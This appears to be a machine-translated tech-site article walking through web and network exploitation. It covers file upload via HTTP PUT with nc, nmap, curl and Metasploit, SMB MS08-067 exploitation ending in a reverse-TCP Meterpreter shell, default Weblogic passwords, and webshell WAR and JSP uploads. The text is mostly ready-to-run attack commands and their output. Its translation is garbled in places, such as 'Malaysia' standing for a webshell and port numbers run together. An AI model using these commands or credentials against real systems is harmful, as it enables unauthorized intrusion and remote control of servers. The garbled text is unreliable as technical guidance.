Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you an example analysis of the posture of Web vulnerability exploitation. the article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

1. HTTP PUT method is used.

PUT is a method for file management. If the operator does not modify the default configuration of the Web server and still supports these methods, you can upload files to the server file system at will.

1.1.The Netcat uses the PUT method

Netcat is a very famous network tool, referred to as "NC", known as "Switzerland" in penetration testing. It can be used as port snooping, port scanning, remote file transfer, remote shell and other functions.

After learning that the PUT method is enabled by the Web service, enter the following command to upload the file:

Nc IP PORT

PUT / dav/hack.txt HTTP/1.1

Host: IP

Press enter twice to see that the hacked.txt file has been successfully created with a status code of 201 and the file creation location in the / dav/ directory.

1.2.The Nmap uses the PUT method

Command:

Nmap-p port IP-script http-put-script-args http-put.url='/dav/test.php',http-put.file='/root/test.php'

Command explanation:

-script http-put / / Select the http-put script, which supports uploading files using the http put method.

-script-args / / set script parameters 1 and 2

Http-put.url='/dav/test.php' / / set parameter 1 to upload the target file path

Http-put.file='/root/test.php' / / set parameter 2 to upload the local file path.

You can see in the figure that the upload is successful through the Nmap script.

1.3 BurpSuite uses the PUT method

Use the daily meeting BurpSuite access upload target path to grab the data packet, modify the packet request method and upload path, write the file content in the request body, and send the packet to the Web server.

The server response package shows that the file was created successfully.

1.4 CURL uses the PUT method

CURL is a file transfer tool that uses URL syntax to work on the command line, uploads or downloads data through a specified URL, and displays the data. The c in curl stands for client, and URL is URL.

The command to create a file through the PUT method is as follows:

Command 1:

Curl-I-XPUT-H "Content-Type: text/plain; charset=utf-8"-d "hack completed" http://192.168.40.4/dav/hack.php

Command explanation:

-i/--include / / include header information when outputting

-X/--request / / specify the PUT command

-H/--header / / Custom header information "Content-Type:text/plain; charset=utf-8" is passed to the server

-d/--data / / HTTP POST to write text to the created http://192.168.40.4/dav/hack.php

Command 2:

Curl-I-X PUT-H "Content-Type:application/xml; charset=utf-8"-d @ "F:\ 1.php" http://192.168.40.4/dav/hack.php

Command explanation:

-d @ "filename" / / read content from a file

1.5 QuickPuT script uses the PUT method

QuickPut is a Python command-line tool that allows you to upload files to the server through the HTTP PUT method.

Upload command:

Python2 QuickPut.py F:\ 1.php http://192.168.40.4/dav/hack1.php

Command explanation:

Python QuickPut.py

1.6 Metasploit uses PUT method

Auxiliary/scanner/http/http_put, the auxiliary module of Metasploit, can upload and delete files.

Command:

Use auxiliary/scanner/http/http_put / / use the http_put module

Show options / / display module parameters

Set RHOSTS 192.168.40.4 / / set the target IP

Set PATH / dav/ set the target path

Set payload php/meterpreter/reverse_tcp / / set attack payload

Set filename msf.php / / set the upload file name

Set FILEDATA file://root/test.php / / sets the data path for uploading local files

Exploit / / start the attack

The result returned shows that the file was uploaded successfully.

2.SMB vulnerability exploitation

After scanning the information collection port, it is found that the host opens port 139445 and the banner is displayed as Microsoft Windows, which will be associated with the SMB vulnerabilities of port 139,445, such as ms17-010, ms08-067, and so on.

Vulnerability detection

Command:

Namp-script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse-sTIP

Namp-script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse-sTIP

Command explanation:

-- script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse / / use the Nmapms08-067 vulnerability scan script

-sT / / scan with TCP

If the output result is:

Smb-vuln-ms08-067:

VULNERABLE:

Microsoft Windows system vulnerable toremote code execution (MS08-067)

State: VULNERABLE

IDs: CVE:CVE-2008-4250

The Server service inMicrosoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,Vista Goldand SP1, Server 2008, and 7 Pre-Beta allows remote attackers to executearbitrarycode via a crafted RPC request that triggers the overflow during pathcanonicalization.

Disclosure date: 2008-10-23

References:

Https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

Then it indicates that there is a ms08-067 vulnerability, and ms17-010 is the same as above.

Vulnerability exploitation

The MSF smb attack module is used to exploit the vulnerabilities of ms08-067 and ms17-010.

Msf > use exploit/windows/smb/ms08_067_netapi

Msfexploit (ms08_067_netapi) > set RHOST IP

Msfexploit (ms08_067_netapi) > exploit

[*] Started reverse TCP handler on snooping IP port locally

[*] Target IP:445- Automatically detecting the target...

[*] Target IP:445- Fingerprint: Windows 2000-Service Pack 0-4-lang:English

[*] Target IP:445- Selected Target: Windows 2000 Universal

[*] Target IP:445- Attempting to trigger the vulnerability...

[*] Sending stage (957487 bytes) to Target IP

[*] Meterpreter session 2 opened (listen on IP port-> destination port bounce)

Meterpreter >

The ms17-010 vulnerability is exploited as above.

3.Weblogic vulnerability exploitation

Weblogic Server application server is often encountered in penetration testing. After seeing Weblogic Server, it is thought that Weblogic Server may have many CVE vulnerabilities in this version, such as background management weak password, JAVA deserialization vulnerability, arbitrary file upload vulnerability and so on. Let's share the ways to exploit various vulnerabilities in Weblogic.

3.1 weak password for background login

Common Weblogic Server login weak passwords:

Weblogic/weblogic

Weblogic/weblogic1

Weblogic/weblogic10

Weblogic/weblogic123

If it exists, you can log in to the application server management backend and upload the webshellwar package.

Deploy the war package in the application server after upload

Malaysia can be accessed after uploading and deploying war package successfully.

3.2 JAVA deserialization vulnerability

CVE vulnerabilities can be detected directly with scripts, and then exploited by exp scripts based on the vulnerability code.

The Weblogic vulnerability detection script is powerful enough to detect a variety of CVE, manage background paths, SSRF, weak passwords, and support later extensions.

It can also be detected and exploited directly by using the Java deserialization exploit tool. Vulnerability tools provide vulnerability detection, command execution, file upload, batch inspection functions.

3.3 Weblogic arbitrary file upload vulnerability

The information is returned by blasting Weblogic.

Get the login password, service name and random character directory, and construct the upload POC to upload the test file.

Pass the following data under the / bea_wls_deployment_internal/DeploymentService path

The server returns the upload success and the absolute path of the file.

Display the contents of the uploaded file after accessing this uploaded file path

Http://IP/bea_wls_deployment_internal/shell.jsp

The above is the example of Web vulnerability exploitation posture shared by Xiaobian. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.